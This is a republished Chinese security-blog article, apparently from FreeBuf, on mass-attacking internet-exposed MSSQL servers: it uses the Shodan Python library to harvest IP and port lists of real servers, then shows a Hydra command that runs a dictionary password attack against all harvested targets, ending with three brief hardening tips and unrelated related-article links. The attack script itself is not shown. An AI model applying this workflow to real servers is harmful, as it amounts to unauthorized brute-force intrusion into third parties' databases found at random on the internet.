专栏首页FreeBuf基于ShodanPython库的批量攻击实践

基于ShodanPython库的批量攻击实践

拜读了xiaix关于Shodan的全面介绍:《Shodan新手入坑指南》,受益匪浅。SQL Server的弱口令入侵案例层出不穷,利用工具也大量存在,本文以MSSQL服务器为切入点,以解决批量目标发现为目标,介绍了一种基于Shodan Python库的攻击方法。希望能给有类似需求的同学提供参考。

01 基本思路

首先利用Shodan的Python库获取并实时处理MSSQL服务器IP及1434端口Banner,得到IP和MSSQL连接端口的组合列表;然后利用Hydra进行字典口令攻击。

SQL Server服务使用两个端口:TCP-1433、UDP-1434。其中1433用于供SQL Server对外提供服务,1434用于向请求者返回SQL Server使用了哪个TCP/IP端口。 —— 百度百科-1433端口

02 实现脚本

实现过程详见脚本中的注释

03 执行示例

执行环境

root@kali2:~/app/mssqlnew# uname -aLinux kali2 4.0.0-kali1-686-pae #1 SMP Debian 4.0.4-1+kali2 (2015-06-03) i686 GNU/Linuxroot@kali2:~/app/mssqlnew# python -VPython 2.7.9

获取地址端口组合列表

root@kali2:~/app/mssqlnew# python MSSQL.py 1 10

page1to10_src.txt

page1to10_ip.txt

hydra字典攻击

攻击耗时及成功率与用户、口令字典有紧密关系,网络带宽也影响速度。

root@kali2:~/app/mssqlnew# hydra -L sqluser.dic -P sqlpass.dic -t 30 -M page1to10_ip.txt mssql

04 安全建议

设置MSSQL仅限本地连接

修改MSSQL的默认连接端口

分级配置各类数据库用户权限

本文分享自微信公众号 - FreeBuf(freebuf),作者:gaearrow

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2017-04-18

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 思科CloudCenter Orchestrator系统曝提权漏洞CVE-2016-9223

    思科提醒用户Cisco CloudCenter Orchestrator系统存在提权漏洞——CVE-2016-9223,可能已经被用于网络攻击。 Cisco C...

    FB客服
  • 预告 | 超级产品力系列之《2020中国网络流量监测与分析产品研究报告》即将发布

    根据ESG调查显示,87%的公司企业使用网络流量分析(NTA)工具进行威胁检测与响应,43%认为网络流量分析是威胁检测与响应的第一道防线。

    FB客服
  • Tor代理通过替换比特币地址将勒索赎金归为己有

    概要 近日,Proofpoint的安全研究人员发现了一种新的窃取他人比特币的方法,即利用Tor代理(onion[.]top)来窃取比特币。据了解,该代理运营商通...

    FB客服
  • 英特尔收购芯片公司eASIC,加速FPGA,降低CPU依赖

    【新智元导读】7月13日据外媒消息,英特尔计划收购小型芯片厂商eASIC,具体财务条款未披露。这一交易将有助于英特尔降低对CPU的依赖,实现业务多元化。

    新智元
  • vue-router的hash和history模式的区别

    对于 Vue 这类渐进式前端开发框架,为了构建 SPA(单页面应用),需要引入前端路由系统,这也就是 Vue-Router 存在的意义。前端路由的核心,就在于 ...

    咻咻ing
  • vue路由mode模式:history与hash的区别

    用户5166330
  • Yeoman 官网教学案例:使用 Yeoman 构建 WebApp

    STEP 1:设置开发环境 ? 与 Yeoman 的所有交互都是通过命令行。Mac 系统使用 terminal.app,Linux 系统使用 shell,win...

    叙帝利
  • 程序员:如何通过一些面试小细节去读懂一个公司?

    以后有想到新的我会补充进去,其实写这篇文章的主要目的,就是希望大家可以意识到,比起结果而言,过程可能更加重要,毕竟人是活在过程中的,不少活在结果里的,人嘛结果只...

    Java架构技术
  • 大数据在电信行业的应用

    电信与媒体市场调研公司Informa Telecoms & Media在2013年的调查结果显示,全球120家运营商中约有48%的运营商正在实施大数据业务。该调...

    CDA数据分析师
  • 【案例】大数据在电信行业的应用

    电信与媒体市场调研公司Informa Telecoms & Media在2013年的调查结果显示,全球120家运营商中约有48%的运营商正在实施大数据业务。该调...

    小莹莹

扫码关注云+社区

领取腾讯云代金券